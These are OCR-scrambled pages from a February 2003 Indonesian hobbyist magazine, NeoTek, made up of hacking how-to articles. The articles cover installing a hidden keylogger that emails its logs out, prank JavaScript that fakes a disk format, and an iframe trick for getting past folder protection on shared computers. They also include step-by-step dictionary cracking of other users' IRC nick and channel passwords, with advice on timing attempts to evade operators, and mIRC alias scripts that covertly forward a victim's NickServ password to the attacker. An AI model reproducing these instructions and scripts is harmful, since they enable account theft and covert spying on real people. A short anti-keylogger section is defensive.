3 Copy web address tersebut, dan
paste di browser anda di bagian
4 Selanjutnya anda dapat melihat
sendiri catatan transaksi belanja
address, dan tambahkan on-line dengan kartu kredit
unicode bug-nya sebagai alat pembayaran di
&template=order.log di bagian Internet pada Web tersebut.
akhir address. Tidak ada spasi
dalam penulisan address.

Februari 2003 NeoTek 23

 NeoStyle

AKSI SPIONASE KEYLOGGER

ata-mata ada di sekitar
M kita. Salah satu perangkat
yang dapat berfungsi
sebagai program spionase adalah

PC ACME NET keylogger. Dan bisa jadi program

ini telah bertebaran dan dipasang
pada komputer-komputer yang
dipakai oleh orang banyak, dengan
tujuan untuk memantau dan
mencuri data.
Artikel ini membeberkan satu pro-
Anda dapat menggunakan keylogger sebagai “mata-mata” untuk gram yang cukup andal untuk ma-
salah spionase ini. Dengan tujuan
mengetahui aktivitas pada sebuah komputer. Happy Chandraleka untuk membuka wawasan anda
(hchandraleka@yahoo.com) membahas PC Acme Net sebagai bahwa ada satu perangkat sema-
cam ini. Selanjutnya mendorong
salah satu keylogger.

PC Acme Net memonitor aktivitas komputer anda.

KEYLOGGERS.COM DOWNLOAD & INSTAL MEMBUKA CONTROL CENTER

1 Dengan sembarang browser,
kunjungi www.keyloggers.com.
2 Klik “Download” di bagian
Akan terdapat beberapa jenis
keylogger buatan Raytown
Corp. Pilih PC Acme Net. Atau
dapatkan dari CD NeoTek
bulan ini.
bawah. Paket programnya
3 Masuklah ke Control Center
melalui Start → Programs →
cukup ringkas sekitar 591 KB PC Acme → Control Center.
dalam bentuk zip. Kemudian Inilah tampilan Control Center
ekstrak file zip tersebut dan yang berfungsi mengatur
instal dengan mengklik ganda konfigurasi keylogger.
pcacme.exe. Lanjutkan proses
instalasi sampai selesai.

HASIL MONITORING BUKA KONEKSI KE INTERNET MENGIRIM FILE LOG KE EMAIL

7 Proses decoding akan berlang-
sung beberapa lama, bergan-
8 Bukalah koneksi ke Internet
tung besarnya file log. Setelah
selesai akan tampil kotak dialog.
Klik saja tombol OK dan file log
yang telah didekrip akan tampil
dengan browser secara
otomatis.
untuk melakukan pengujian fitur
9 Program ini juga dapat diatur
agar mengirim file log ke alamat
Sender Options pada program email tertentu. Pilih tab Sender
PC Acme Net. Isikan data pada Options. Cek “Enable Sender”
User Name, Password, dan dan “Email.” Tekan “Add.” Leng-
Phone number, kemudian klik kapi account parameter-nya.
“Connect.” Anda bisa juga melakukan
pengetesan terlebih dahulu.

24 NeoTek Februari 2003


pembaca untuk waspada, terlebih lagi
bila melakukan hal yang berkaitan
dengan keamanan data pribadi anda
pada komputer yang dipakai oleh
orang banyak. Anda tentu tidak ingin
data password, kartu kredit, atau data
personal lain diketahui orang. Laku-
kan hal tersebut pada komputer
pribadi saja.
Program PC Acme Net ini mencakup
fitur yang cukup lengkap. Program ini
akan bekerja di belakang layar untuk
memonitor ketukan pada keyboard,
operasi file, alamat-alamat situs yang
dikunjungi user, dll. Data-data yang
terkumpul itu akan terekam dalam
MENGAKTIFKAN FITUR
4 Pilih tab “General Options.” Te-
kan “Start logger” untuk meng-
aktifkan Logger Status. Pastikan
juga anda memberi tanda cek
pada “Run logger at system
startup.” Tekan tombol “Apply,”
kemudian “Exit.”
LIHAT DI OUTLOOK EXPRESS
10 Jalankan Outlook Express. Hasil
monitoring dikirimkan oleh PC
Acme Net ke email account
dengan Subject: Report. Coba
lihat juga hasil pengetesan
pada Langkah 9.
NeoStyle
sebuah file log yang terenkripsi. Nanti-
nya file log tersebut dapat dilihat dan
bahkan dapat dikirimkan ke alamat
email tertentu atau ke komputer lain
dalam suatu jaringan.
• Keylogger PC Acme Net bekerja di
belakang layar, memantau semua aktivitas
yang berkaitan dengan pengoperasian
sebuah komputer.
PENGUJIAN MELIHAT FILE LOG
5 Coba jalankan aplikasi Word.
Ketikkan sembarang tulisan. PC
6 Dari menu Start → Programs
→ PC Acme, pilih View Log.
Acme Net akan merekam ke- Beri tanda cek pada “Log file
tukan pada keyboard, pene- from current computer.” Lanjut-
kanan tombol kiri dan kanan kan dengan menekan tombol
mouse, alamat situs yang di- “Decode” untuk mendekripsi
kunjungi dan program-program file log.
yang dijalankan.
MENYIMPAN FILE LOG WARNING
11 File log dapat disimpan untuk
dibuka lain waktu. Masuklah ke
12 Program PC Acme Net yang di-
paparkan disini belum teregis-
Control Center, pilih tab “General trasi, sehingga akan muncul pe-
Options.” Tekan tombol “Save ringatan seperti gambar di atas.
log file as ….” Setelah tersimpan Pilih Yes untuk melanjutkan uji
program akan mencatat data- coba program atau No untuk
data dari awal kembali. meng-uninstall. Tetapi sebaiknya
anda meregistrasi program ini.
Februari 2003 NeoTek 25
 NeoStyle

KONTRA SPIONASE
eylogger merupakan pro-
K gram mata-mata yang
bekerja secara tersembu-
nyi. Tidak tampak pada tampilan
KEYLOGG E R DE NGAN kotak dialog Close Program atau
End Task. File log-nya juga ter-
sembunyi dan terenkripsi sehing-

ANTI-KEYLOGGER 2.2 ga bila tanpa bantuan program

dari luar, tentu sangat sulit untuk
mengetahui adanya program
keylogger yang sedang aktif pada
komputer kita yang dipasang oleh
Aktivitas berkomputer anda “dimata-matai” dengan keylogger? orang lain.
Tidak usah khawatir, Happy Chandraleka (hchandraleka@ Pembahasan ini merupakan rang-
yahoo.com) menguraikan cara mengatasinya dengan program kaian dari bahasan sebelumnya. Di
sini anda akan mempelajari cara
Anti-keylogger 2.2.

Jangan mau menjadi korban keylogger.

ANTIKEYLOGGERS.COM INSTALASI CATATAN

1 Jalankan browser yang ada
dan ketikkan alamat
2 Proses download selesai. Klik
www.anti-keyloggers.com.
Download program Anti-
Keylogger versi 2.2 yang ber-
ukuran sekitar 1,16 Mb atau
dapatkan dari CD NeoTek
bulan ini.
ganda file zip-nya. Anda dapat
3 Program ini merupakan versi
tidak terdaftar (trial) sehingga
langsung melakukan instalasi hanya bisa mendeteksi saja,
dengan menekan tombol tetapi tidak dapat menonak-
“Install” pada toolbar Winzip. tifkan keylogger yang sedang
Lanjutkan proses instalasi bekerja pada komputer anda.
sampai selesai.

PROSES SCANNING TERDETEKSI! SILUMAN

7 Proses scanning akan berjalan
beberapa menit. Anti-Keylogger
8 Proses scanning selesai dan pro-
ini akan mencari program key-
logger yang sedang aktif pada
komputer anda. Pointer mouse
akan terkunci pada bidang form
Scanning.
gram keylogger PC Acme Net
9 File log yang terdeteksi ini tidak
dapat dilihat dengan Windows
yang sedang aktif terdeteksi oleh Explorer atau dengan fitur Find
Anti-Keylogger ini. File log yang Files or Folders bawaan dari
terdeteksi berada di folder Windows. Di contoh ini file log-
C:\Windows\System. Nama file nya bernama iifhahia.hiv. Nama
bisa bervariasi, tetapi dengan file mungkin berbeda di kompu-
ekstensi .hiv. ter anda.

26 NeoTek Februari 2003


mendeteksi keberadaan program key-
logger yang terpasang pada komputer
anda.
Perangkat yang digunakan adalah
program Anti-keylogger versi 2.2,
produk dari Raytown Corp. Program
yang diujicobakan di sini adalah versi
demo (unregistered), sehingga tidak
disediakan fitur untuk menonaktifkan
keylogger. Anda harus melakukan re-
gistrasi terlebih dahulu. Meski demi-
kian versi demo ini dapat dimanfaat-
kan untuk mendeteksi keberadaan
keylogger pada komputer anda. Seti-
daknya dapat membantu anda untuk
bersikap waspada.
MENGAKTIFKAN KEYLOGGER
4 Masuklah ke Control Center
dari PC Acme Net yang telah
diinstal pada bahasan sebe-
lumnya. Pada bagian General
Options tekan tombol “Start
logger” untuk mengaktifkan
keylogger. Klik “Exit” untuk
keluar.
MENGHAPUS FILE LOG
10 File itu berisi data rekaman ak-
tifvtas anda. Perlu dihapus. Ja-
lankan MS-DOS prompt dari
menu Start → Programs. Akan
tampil jendela MS-DOS dengan
direktori aktif C:\Windows. Ke-
tik “cd system” untuk masuk ke
folder System. Tekan Enter.
NeoStyle
• Anti-keylogger
mendeteksi semua
ketukan yang
dianggap
“unauthorized.” Hasil
pemantauan direkam
pada sebuah file log.
MENJALANKAN MEMULAI SCANNING
5 ANTIKEYLOGGER
Jalankan Anti-keylogger yang
6 Tekan “Scan” untuk melakukan
scanning. Akan muncul peri-
telah di-install pada langkah 2. ngatan. Anda harus menutup
Pilih menu Start → Programs aplikasi lain sebelum melaku-
→ Anti-keylogger. Masukkan kan scanning. Klik OK untuk
password seperti yang anda isi melakukan scanning atau
pada proses instalasi. Cancel untuk membatalkannya.
LIHAT DAN HAPUS BACA HELP-NYA
11 Ketik “dir *.hiv” untuk melihat
keberadaan file log ini. Untuk
12 Untuk mengetahui informasi
lebih lanjut tentang program ini,
menghapusnya, ketik “del *.hiv.” ada baiknya anda membaca file
Lanjutkan dengan menekan Help program Anti-keylogger ini.
Enter. Ketik “Exit” dan tekan
Enter untuk keluar dari MS-DOS
Prompt.
Februari 2003 NeoTek 27
 NeoStyle

Godain Kita Dong!

dengan Fake JavaScript
Untuk melengkapi tutorial JavaScript yang sudah cukup lama dimuat di NeoTek,
MA Rody Candera (odyxb@melva.org) membahas skrip-skrip iseng yang dapat dibuat
dengan JavaScript. Skrip iseng sebenarnya tinggal selangkah lagi ke ‘skrip curang’ atau ‘skrip jahat.’

‘Memformat’ hard disk

Masukkan Fake JavaScript seperti di bawah ini pada tag
<head>
<script language="JavaScript">
<!--
window.onerror=null;
var down;var min1,sec1;var cmin1,csec1,cmin2,csec2;
function Minutes(data) {
for(var i=0;i<data.length;i++)
if(data.substring(i,i+1)==":")
break;
ernah dengar istilah Fake JavaScript? JavaScript,
P seperti kita ketahui, digunakan untuk mendukung
HTML untuk menghadirkan halaman Web atau
}
return(data.substring(0,i));

function Seconds(data) {
homepage menjadi dinamis. Hampir seluruh halaman Web for(var i=0;i<data.length;i++)
if(data.substring(i,i+1)==":")
yang kita jumpai menggunakan JavaScript. break;
Bagi programmer yang memahami dan menguasai Java- return(data.substring(i+1,data.length));
}
Script dengan baik, membuat JavaScript makin menarik function Down() {
untuk disimak. Fake JavaScript contohnya. Dari namanya cmin2=1*Minutes(document.sw.disp1.value);
sedikit berbau Hack. Hanya baunya saja tetapi demikian csec2=0+Seconds(document.sw.disp2.value);
ditujukan untuk hack. Fake JavaScript lebih menjurus ke- DownRepeat();
pada humor, dimana user dibuat cemas terhadap apa yang }
function DownRepeat() {
terjadi pada komputernya jika halaman Web atau home- csec2--;
page yang dibuka ternyata menggunakan Fake JavaScript. if(csec2==-1) {
csec2=59; cmin2--;
Artikel ini merupakan pengalaman penulis ketika mem- }
buka sebuah halaman Web di mana ada pemberitahuan window.setTimeout('fakeformat(-1)',200);
jika sedang terjadi proses format hard disk di komputer }
lokal, status bar browser menunjukkan aktivitas tersebut function D() {
cmin2=1*Minutes(document.sw.disp1.value);
seakan-akan benar-benar terjadi. Setelah penulis mencari csec2=0+Seconds(document.sw.disp2.value);
tahu hal tersebut, ternyata sesungguhnya proses format DRepeat();
tersebut tidak terjadi. Itu hanya sebuah lelucon. }
function DRepeat() {
Mungkin lelucon tersebut mengajak kita untuk sedikit csec2--;
bersantai agar kita jangan terlalu larut dalam keseriusan if(csec2==-1) {
tinggi saat berselancar di dunia maya. csec2=59; cmin2--;
}
Di sini tidak dibahas bagaimana membuat Fake JavaScript, self.status="Document: Done";
tetapi mengulas JavaScript yang seakan-akan dapat mem- }
function faketake(percent1){
format hard disk. Setelah mempelajari artikel ini, anda if(percent1 < 100){
dapat menggunakannya untuk “menggoda” peselancar percent1++;
yang mengakses halaman Web anda. window.status="Upload of drive C:\\ in progress: "+percent1+"%
complete";
Untuk menggunakan JavaScript yang dikatakan di atas, fid1=window.setTimeout("faketake("+percent1+")",200);
yang pertama perlu dilakukan adalah membuat skripnya. }else{
Pada artikel ini, disertakan kode Fake JavaScript yang telah window.status="Upload of hard drive complete.. Now
dikatakan di atas. Mari kita gunakan halaman Web anda. deleting...";Down();}}
function fakeformat(percent){
Buatlah terlebih dahulu halaman Web dengan menggu- if(percent < 100){
nakan HTML. Anda dapat menggunakan Notepad yang percent++;
window.status="Format of drive C:\\ in progress: "+percent+"%
merupakan software yang built-in di Windows sebagai complete";
editor untuk membuatnya. Yang terpenting komputer fid=window.setTimeout("fakeformat("+percent+")",360); // 900
kita anda mendukung JavaScript atau browser yang anda }else{
gunakan adalah Microsoft IE 4.0 ke atas. window.status="Format of hard drive complete...";D();}}

28 NeoTek Februari 2003

 NeoStyle

window.setTimeout('faketake(-1)',200);

function go()
{
var yo=this.location;
window.open(yo);
}
// -->
</script>

Jika layar browser tersebut ditutup, maka secara otomatis

akan muncul kembali terus begitu jika kita berusaha
untuk menutupnya. Bagaimana untuk menutup secara
tuntas? Wah, itu urusan anda!

Selanjutnya masukkan skrip di bawah ini pada tag <body>
<form name='sw'>
<input type="hidden" name="disp1" value="0:05">
<input type="hidden" name="disp2" value="0:05">
</form>
Tambahkan onload=”go()” ke dalam tag <body> agar
ketika halaman Web di-upload pertama kali, Fake Java-
Script langsung dijalankan.
Fake Crash
ada pembahasan sebelumnya telah dikemukakan
P mengenai Fake JavaScript yang seakan-akan
benar-benar memformat hardisk. Artikel kedua
ini membahas mengenai Fake JavaScript yang lain yaitu
Crash Browser.
Crash Browser, maksudnya adalah memunculkan browser
yang tanpa diaba-aba muncul begitu saja dengan jumlah
yang banyak ketika kita meng-upload halaman Web ter-
sebut. Dalam waktu yang tidak lama, kita melihat begitu
banyak browser yang muncul tanpa bisa dihentikan yang
mungkin saja dapat membuat komputer kita menjadi crash.
Bagaimana kita memindahkan skrip tersebut ke dalam
halaman Web kita? Pertama kita harus membuat lebih
dahulu skripnya.
<script laguage="javascript">
window.open('http://www.wadah-online.com=10000');
window.open('http://www.odyxboy.i-p.com=10000');
window.open('http://www.wadah-online.com=10000&item=3');
window.open('http://www.odyxboy.i-p.com=5000&item=4');
window.open('http://www.wadah-online.com=5000&item=4');
window.open('http://www.odyxboy.i-p.com=10000&item=3');
window.open('http:/www.wadah-online.com=5000');
window.open('http://www.odyxboy.i-p.com=5000');
window.open('http://www.wadah-online.com=5000&item=3');
window.open('http://www.odyxboy.i-p.com=5000&item=3');
window.open('http://www.wadah-online.com=5000&item=4');
window.open('http://www.odyxboy.i-p.com=5000&item=4');
window.open('http://www.wadah-online.com');
</script>
Pindahkan script tersebut pada tag <bbody>

Selanjutnya, SAVE pekerjaan anda tersebut dengan file

ekstension *.html misal formathdd.html di mana anda suka.
Selesai sudah, tinggal anda jalankan hasil pekerjaan
tersebut dan lihat hasilnya.

Februari 2003 NeoTek 29

 NeoStyle

Selanjutnya simpan dengan file ekstension *.html misal-

nya crash.html. Jalankan hasil pekerjaan anda tersebut
dan rasakan hasilnya.

• Browser anda crash?

Jangan kaget dulu,
jangan-jangan yang
terjadi sebenarnya ‘Fake
Crash’ akibat ulah sckip
iseng JavaScript.

‘Mengintip’ isi hard disk

ada pembahasan sebelumnya telas diulas mengenai
P Fake JavaScript. Pada artikel ini yang akan diulas
adalah mengenai Fake HTML yang dapat meng-
intip isi hardisk pada komputer lokal atau komputer yang
mengupload halaman web yang menggunakan fake HTML.
Mengintip di sini maksudnya adalah melihat daripada isi
hardisk dimana komputer yang digunakan ternyata
menggunakan software Folder Guard untuk melindungi
isi hardisk dari tangan jahil.
Pengalaman penulis ketika menggunakan internet pada
sebuah warnet yang dimana ternyata penulis tidak dapat
mengakses file atau data yang ada di drive pada hardisk Simpan pekerjaan anda dengan file ekstensionnya *.html
karena telah diproteksi dengan menggunakan Folder → fake.html dan setelah itu coba jalankan untuk melihat
Guard. Setelah penulis menggunakan trik Fake HTML, hasilnya. Hasilnya kurang lebih seperti pada gambar di
barulah dapat terlihat file-file yang ada di hard disk. halaman berikut.
Untuk mempercantik tampilan halaman Web, anda dapat
berkreasi sendiri agar menarik perhatian orang yang
mengupload halaman web tersebut. Dapat ditambahkan
langsung dengan kata-kata agar orang yang melihat
langsung tahu sedang melihat isi folder yang mana, dan
juga menambah <iframe> untuk folder yang berbeda.
Dari gambar diatas akan didapat hasil sebagai berikut:

Fake HTML ini sebenarnya menggunakan daripada tag

<iframe> jadi bukan menggunakan script khusus, dan
caranya sangat gampang sekali. Anda hanya diminta
untuk telah mengerti dan dapat menggunakan HTML.
Buatlah halaman web anda cukup dengan menggunakan
NOTEPAD, buat sepertia biasa aturan dasar HTML.
Setelah itu barulah kita gunakan tag <iframe> yang
ditambahkan pada tag <body>
Keterangan:
<iframe src="file:\\\C|\" width=200 height=150></iframe>

• src="file:\\\C:|" è menentukan bagian isi hardisk

yang akan diperlihatkan, dapat juga ditentukan
langsung ke folder tertentu.
contoh: src="file:\\\C:\My Documents\"
• width=200 → menentukan lebar frame.
• Height=250 → menentukan panjang frame.

30 NeoTek Februari 2003

 NeoStyle

I RC PASSWO R D C R AC K I N G

Nick & Channel I R C

Dengan menggunakan Wicked IRC Password Cracker, Eryanto Sitorus (ery@postmaster.co.uk)
menguraikan cara meng-crack kata sandi nick dan channel di IRC.
Uraian disertai dengan petunjuk langkah per langkah yang mudah diikuti.

ASIH TENTANG PASSWORD CRACKING. Kali ini saya

M akan membahas teknik atau cara meng-crack kata
sandi (password) nick dan channel IRC orang
lain. Namun sebelum itu saya ingin menjelaskan terlebih
dahulu secara singkat pengertian nick dan channel, ter-
masuk fungsi dan kegunaannya.
Di IRC, khususnya di server-server IRC yang sudah beken
dan tekenal seperti: DALnet, EFnet, atau UnderNet, nick
adalah suatu keharusan yang wajib dimiliki oleh setiap
orang (peserta). Tanpa nick maka jangan harap anda bisa
masuk ke dalam server-server IRC tersebut.
Nick dan Channel
Apakah guna nick? Gunanya tentu saja agar orang lain
bisa mengenali dan memanggil anda dengan suatu sebut-
an yang jelas. Sekedar informasi, anda bebas memilih
sembarang nick. Bisa berdasarkan nama kecil (panggilan)
anda sendiri, nama orang lain, nama artis idola, atau bisa
juga berdasarkan nama binatang kesayangan anda. Sepan-
jang nama (nick) tersebut belum dimiliki atau digunakan
orang lain, maka tidak ada alasan bagi anda untuk tidak
bisa menggunakannya. Lalu fungsinya? Apa cuma
sekedar nama panggilan doang? Tentu saja tidak! karena
justru di sinilah letak pentingnya sebuah nick di IRC.
Setelah anda memilih sebuah nick, dan kemudian mere- • Level jabatan di IRC
gistrasi atau mendaftarkannya ke NickServ, maka secara
tidak langsung saat itu juga anda resmi menyandang pang- Keterangan gambar:
kat/predikat sebagai bos, pemilik, atau founder sebuah Founder adalah pemilik tunggal suatu channel di IRC.
channel, jika kelak anda memutuskan untuk membuat- Founder berhak untuk mengubah kata sandi channel, des-
nya. Dan dengan pangkat itu pulalah kelak anda berhak kripsi, setting, dan topik channel, mengangkat satu atau
mengangkat peserta lain untuk menjadi OP (channel oper- beberapa peserta lain untuk menjadi channel operator,
ator), termasuk mengangkat seorang rekan yang anda dan men-drop atau menghapus registrasi channel.
percayai untuk menjadi wakil (co-founder) di channel-
channel yang anda bangun. CO Founder adalah seseorang yang dipercaya untuk men-
jadi wakil founder. Untuk mengangkat seseorang menjadi
Singkat kata, nick yang telah diregistrasi secara sah, ada- wakil (CO-Founder), founder harus memberitahu kata
lah syarat awal untuk menjadi founder atau channel oper- sandi nick-nya. Dan setelah nick tersebut diidentifikasi
ator. Sedangkan channel (kanal), kita bisa artikan atau maka secara otomatis CO Founder akan memiliki hak
anggap sebagai pangkalan, atau tongkrongan untuk tem- yang sama seperti founder untuk mengatur channel,
pat ngumpul, ngerumpi, atau berdiskusi secara real-time, mengangkat peserta lain untuk menjadi SOP/AOP,
dan tentu saja sebagai suatu komunitas yang diakui seca- mengubah setting dan kata sandi channel, mengganti
ra resmi oleh Channel Services (ChanServ). Dan jangan topik channel, menghapus account peserta dari daftar
lupa, semakin banyak jumlah anggota atau peserta chat SOP/AOP, dan lain sebagainya.
yang ikut bergabung masuk ke dalam channel anda, maka
nilai prestisenya pun akan semakin tinggi pula. Dengan SOP Jika dilihat dari struktur, SOP adalah orang kedua se-
kata lain, channel berikut nick anda yang terdaftar sebagai telah founder atau CO Founder. Seorang SOP tidak me-
pemilik (founder) dari channel tersebut, termasuk nick miliki hak untuk mengubah setting channel atau kata
orang lain yang anda angkat sebagai co-founder dan chan- sandi. SOP hanya bisa mengangkat peserta lain untuk
nel operator, akan semakin bernilai di mata peserta chat menjadi channel operator sebagai AOP, atau menghapus-
lain. Struktur kepangkatan atau jabatan di IRC, bisa kita nya. Dalam keadaan tertentu, SOP kadang juga bisa atau
gambarkan sebagai berikut. dimungkinkan mengganti topik channel.

Februari 2003 NeoTek 31

 NeoStyle

AOP adalah channel operator paling rendah (bawahan). Di
dalam channel, seorang AOP hanya bisa mengeluarkan
(kick) peserta lain dari dalam channel jika dianggap nakal.
AOP juga boleh memberi status +V (voice). Tapi AOP
tidak berhak mengangkat peserta lain untuk menjadi
channel operator, apalagi sampai meng-kick atau
menghapus account SOP.
User Biasa Para peserta (anggota) yang ikut meramaikan
channel. User biasa tidak memiliki hak sedikit pun untuk
ikut campur dalam mengelola channel.
Nah, setelah anda memahami arti, fungsi, dan kegunaan-
nya, sekarang saya akan membahas cara meng-crack kata
sandi (password) kedua komponen penting IRC tersebut.
Adapun tool atau program yang akan kita gunakan untuk
melakukan tugas tersebut, adalah Wicked IRC Password
Cracker. Tool ini merupakan skrip addon IRC yang dibuat
oleh seseorang dengan inisial Beefcake. Sayangnya alamat
Web pemilik program yang dicantumkan dalam file READ-
ME.TXT sudah tidak aktif lagi. Jadi, jika anda tertarik meng-
gunakan Wicked IRC Password Cracker, silakan menginstal-
nya langsung dari CD NeoTek nomor ini. Atau anda juga
bisa men-download-nya di
www16.brinkster.com/erytricksy/Software/irc_cracker.zip
Meskipun cara kerja program ini bisa dikatakan sangat
simpel dan sederhana, tetapi menurut informasi pembuat-
nya, program yang dibuat dari bahasa skrip IRC ini per-
nah sukses meng-crack beberapa kata sandi nick dan
channel IRC. Bahkan saya sendiri, setelah melakukan uji
coba, berhasil meng-crack sebuah kata sandi nick dan
channel musuh lama saya di server IRC DALnet. Proses
itulah yang saya jadikan gambar untuk melengkapi
tulisan ini.
Agar anda tidak memperoleh pesan kesalahan seperti
yang terlihat pada gambar di bawah ini saat menginstal
Wicked IRC Password Cracker, pastikan bahwa di dalam
direktori C:\WINDOWS\SYSTEM anda sudah ada file-
file berikut:
• MSVCRT40.DLL
• OLEPRO32.DLL
• VB40032.DLL
Jika anda tidak berhasil menemukan ketiga buah file ter-
sebut di atas dalam folder C:\WINDOWS\SYSTEM\,
silahkan mendownloadnya di
www16.brinkster.com/erytricksy/Software/vb40032.zip
atau anda bisa me-request-nya ke alamat email saya.
• Pesan kesalahan saat menginstal Wicked Password Cracker.

Menginstal Wicked IRC Password Cracker

MULAI MENGINSTAL MENENTUKAN DIREKTORI CONTROL CENTER

1 Pertama, ekstrak file irc_crack.
zip, lalu jalankan file SETUP.
2 Tentukan direktori untuk mele-
takkan file instalasi. Klik Next
3 Proses instalasi selesai! Klik
Finish untuk menutup pesan
EXE. Kemudian klik Next. 3 kali untuk melanjutkan. Setup Complete.

MENAMBAHKAN SKRIP Addon (load) skrip yang anda instal ke mIRC SETELAH PROSES ADDON
4 client anda. Caranya, jalankan program mIRC, lalu dari jendela status
mIRC, ketik /LOAD -RS C:\WICKED\CRACKER\CRACK.MRC. Ketika anda
5 Jika addon sukses (skrip ber-
hasil di-load), akan muncul
mengetik perintah tersebut, program mIRC akan meminta konfirmasi. pesan di atas.

32 NeoTek Februari 2003

 NeoStyle

Meng-crack kata sandi nick

Karena yang akan di-crack adalah kata sandi atau password nick IRC orang lain melalui program mIRC, maka anda
harus menghubungkan mIRC anda terlebih dahulu ke dalam salah satu server IRC (saya sarankan anda masuk ke
server IRC DALnet). Langkah-langkahnya adalah sebagai berikut:

MENENTUKAN NICK DIREKTORI FILE DIC MENENTUKAN URUTAN (LINE)

1 Dari jendela status mIRC, klik
tombol kanan mouse anda.
2 Ulangi proses pada Langkah 1:
Lalu sorot menu Password
Cracker → Nick Cracker → Pro
Setup → Set Nick. Ketikkan
nick yang akan anda crack.
Password Cracker → Nick
3 Ulangi kembali Langkah 1,
Password Cracker → Nick
Cracker → Pro Setup → Set Cracker → Pro Setup → Set
Dic untuk men-set Dic (dict- Line untuk men-set dari mulai
ionary) kata sandi nick. Lalu urutan keberapa kata sandi
tentukan lokasi atau tempat akan dijalankan.
file dic.txt.

MENENTUKAN TIMER MEMULAI CRACKING MENENTUKAN URUTAN (LINE)

4 Sekali lagi, ulang Langkah1, de-
ngan diakhiri Set Speed untuk
5 Setelah semua selesai di-set,
mengatur timer atau waktu pro-
ses cracking. Agar IRC Operat-
or (IRCop) tidak mengendus
adanya percobaan password
cracking, sebaiknya timer di set
sebanyak 10-25 detik. Bila an-
da memasukkan angka kurang
dari 3-5 detik, maka IRCop akan
memberi warning kepada
anda, seperti gambar di atas.
anda dapat mulai meng-crack.
6 Jika nasib anda sedang baik, bu-
kan tidak mungkin anda men-
Ulangi Langkah 1, kemudian dapat pesan “Password accept-
sorot menu Password Cracker ed for…” seperti gambar di
→ Nick Cracker → Start untuk atas. Oleh karena itu, anda agar
memulai proses cracking. Pa- tidak pesimis. Jika anda berusa-
da awal-awal anda mungkin ha, niscaya anda akan berhasil!
menerima pesan “incorrect”
dari NickServ, bahwa kata san-
di yang ter-entry secara oto-
matis itu salah, seperti pada
gambar di atas.

Meng-crack kata sandi channel

Untuk meng-crack kata sandi channel, langkah-langkah-
nya persis sama seperti meng-crack kata sandi nick.
Pertama klik tombol kanan mouse di dalam jendela Status
mIRC, lalu sorot menu Password Cracker → Chan
Cracker → Pro Setup → Set Chan.
Setelah anda mengetik nama channel yang akan anda
crack, ulangi kembali langkah tersebut, lalu pilih atau
sorot menu Password Cracker → Chan Cracker → Pro
Setup → Set Dic, demikian seterusnya sampai tahap
terakhir (Password Cracker → Chan Cracker → Start.)
Sekali lagi saya ingatkan, janganlah lekas menyerah jika
upaya pertama anda menemui kegagalan.

Februari 2003 NeoTek 33

 NeoStyle

I RC PASSWO R D C R AC K I N G
Skrip Nick Password Cracking
Anda dapat meng-crack kata sandi nick seseorang pada IRC dengan menggunakan skrip yang ditanamkan
di komputer orang lain. MA Rody Candera (odyxb@melva.org) memberiikan skrip itu
disertai dengan petunjuk penggunaanya langkah per langkah.

RTIKEL INI SEBENARNYA DIBUAT KARENA diilhami

A artikel Eryanto Sitorus Nguping di IRC (NeoTek
Vol. III, No. 2). Artikel ini tidak berjudul mengu-
ping karena memang tidak melakukan tindakan menguping,
tetapi memaparkan cara atau teknik mendapatkan kata
sandi (password) nick seseorang yang telah diregisterkan.
Untuk mendapatkan kata sandi tersebut dibutuhkan skrip
mIRC, umumnya skrip itu ditanamkan di Tools Menu
Remote (perhatikan skrip mIRC tulisan Eryanto Sitorus).
Skrip yang akan dipaparkan berikut berbeda tempat me-
nanamkannya, skripnya ditanam di Tools Menu Aliases.
Skrip ini sudah diujikan beberapa kali dengan hasil selu-
ruhnya sukses, anda dapat mencobanya nanti. Hanya per-
masalahannya adalah bagaimana menanamkannya di
komputer orang lain yang jauh jaraknya dari tempat kita.
Penulis sendiri mengakui belum berhasil menemukan
cara tersebut, mungkin saudara Eryanto Sitorus nantinya
dapat membantu kita semua?
Ada dua skrip yang nantinya akan ditanamkan ke dalam
Aliases, skrip pertama dapat dilihat di bawah ini. Skrip ini
digunakan untuk merespon event dimana seseorang yang
akan melakukan identify nicknya dengan command
/nickserv identify [pass] dan mengirimkan password dari
nick tersebut ke dalam bentuk memo.
Skrip yang kedua berfungsi untuk merespon seseorang
yang melakukan identify nick-nya dengan command
/identify [pass] dan mengirimkan password tersebut
dalam bentuk memo
/nickserv {
/set %y1 $$1
if ( %y1 == identify ) {
/set %y2 $$2
/.msg nickserv@services.dal.net $1-
/.timer 1 480 /.memoserv send [Nick] Nick: $me Password:
%y2
/.timer 1 485 /.clear
}
else /.msg nickserv@services.dal.net $1-
/.unset %y1
/.unset %y2
}
Perhatikan skrip tersebut, ganti [Nick] dengan nick anda
yang telah diregisterkan agar password terhadap nick
orangl ain yang telah diregisterkan dikirimkan sebagai
memo ke nick anda. Tanamkan saja kedua-duanya sebagai
langkah antisipasi dan posisikan script tersebut dengan
aman agar tidak terlihat oleh orang lain, dapat dengan
cara memposisikan script tersebut lebih ke bawah dari
script yang telah ada sebelumnya di dalam Aliases.

/identify {
/set %y1 $$1
/.msg nickserv@services.dal.net identify $1-
/.timer 1 480 /.memoserv send [Nick] Nick: $me Password: %y1
/.timer 1 485 /.clear
/.unset %y1
}

Mari kita mencoba skrip tersebut.

34 NeoTek Februari 2003

 NeoStyle
Buka mIRC anda tanpa mela-
1 kukan koneksi ke server dalnet
karena kita akan memindah-
2 klik Aliases... Alt + A tunggu
kan skrip tersebut terlebih
dahulu.
Agar skrip tersebut tidak dili-
4 hat orang lain yang kebetulan
melihat-lihat Editor mIRC,
5 kan kembali scroolbar ke atas
tetapi biasanya orang lebih
suka melihat Editor mIRC Re-
mote untuk menghindari hal-
hal yang dianggap menggang-
gu privasinya, seperti yang
sering dilakukan penulis sen-
diri, turunkan skrip tersebut ke
bawah sehingga Editor mIRC
Aliases muncul scroll bar
Setelah koneksi berjalan, nick
7 teregister yang anda pakai di-
minta untuk memasukkan pass-
8 sekitar 8 menit, perhatikan
wordnya sebagai bukti kalau
user tersebut adalah pemilik
nick tersebut.
35 NeoTek Februari 2003
Klik Tools Menu → pilih dan
sampai Editor mIRC untuk
3 hatkan di atas ke dalam Editor
Aliases muncul.
Masih di Editor mIRC, posisi-
dan klik File → Save → OK.
6 skrip tersebut, dan tinggal me-
Tunggu untuk beberapa saat
Status. Muncul pesan bahwa
9 lagi, gunakan nick yang dipakai
ada pengiriman memo ke nick
tertentu, tetapi itu hanya seben-
tar dapat dilihat karena 5 detik
ke depan semua tulisan di
Status hilang (seperti melaku-
kan command Clear). Itu mem-
buktikan pekerjaan anda
berhasil.
Pindahkan skrip yang diperli-
